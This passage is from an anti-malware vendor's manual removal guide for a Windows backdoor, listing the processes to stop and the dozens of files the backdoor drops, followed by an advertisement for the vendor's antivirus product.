    %original file name%.exe:596
    TyHelpTFUO.exe:1516

  2. Delete the original Backdoor file.
  3. Delete or disinfect the following files created/modified by the Backdoor:

    %Documents and Settings%\%current user%\Local Settings\Temp\3e88bb2a\temp.ca (10801 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@masterial[1].txt (219 bytes)
    %Program Files%\PriceLeses\NoXzg4pkazG9ZC.dll (3927 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\CmPMt7BDxLvtoE[1].ca (5431 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
    %Program Files%\PriceLeses\NoXzg4pkazG9ZC.dat (26 bytes)
    %Program Files%\PriceLeses\NoXzg4pkazG9ZC.tlb (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2027aD4c704\images\loader.gif (2 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\cd5b15e575e1c3d03eba457016c7580f.ini (508 bytes)
    %Program Files%\PriceLeses\NoXzg4pkazG9ZC.exe (838 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2027aD4c704\images\progressbar.gif (588 bytes)
    %Program Files%\Follow\Follow.dat (6 bytes)
    %Program Files%\Follow\Follow.exe (838 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9LLCZ7S\wKjUaVakO6heQO[1].ca (210 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\00f6573f\temp.ca (1491 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\0f77a858\temp.ca (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\68f19A9f\images\loader.gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\68f19A9f\images\progressbar.gif (588 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\r1.flagmisterlibcontent[2] (2 bytes)
    %Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.exe (838 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\4bE3F8f474\images\progressbar.gif (588 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\4bE3F8f474\images\loader.gif (2 bytes)
    %Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.dll (3927 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\28aa5195\temp.ca (10294 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@bestories[1].txt (219 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\yNMtlpV56NSC6w[1].ca (5431 bytes)
    %Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.dat (24 bytes)
    %Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.tlb (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\1[1].txt (28 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1.ini.task (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1_4.ini.task (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\r1.flagmisterlibcontent[1] (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\images\loader.gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\1_2_1[1].txt (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1_3.ini.task (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_1_4.ini.tmp (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_1_3.ini.tmp (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\images\progressbar.gif (588 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_2_1.ini.tmp (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9LLCZ7S\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1.ini.tmp (56 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\%original file name%.exe (37624 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_2.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\1_1[1].txt (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9LLCZ7S\1_1_3[1].txt (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_1.ini.tmp (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\1_2[1].txt (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\r1.flagmisterlibcontent[1] (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\bg.ca (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\1_1_4[1].txt (10 bytes)
    %Program Files%\Supporter\Supporter.dll (262021 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (28502 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now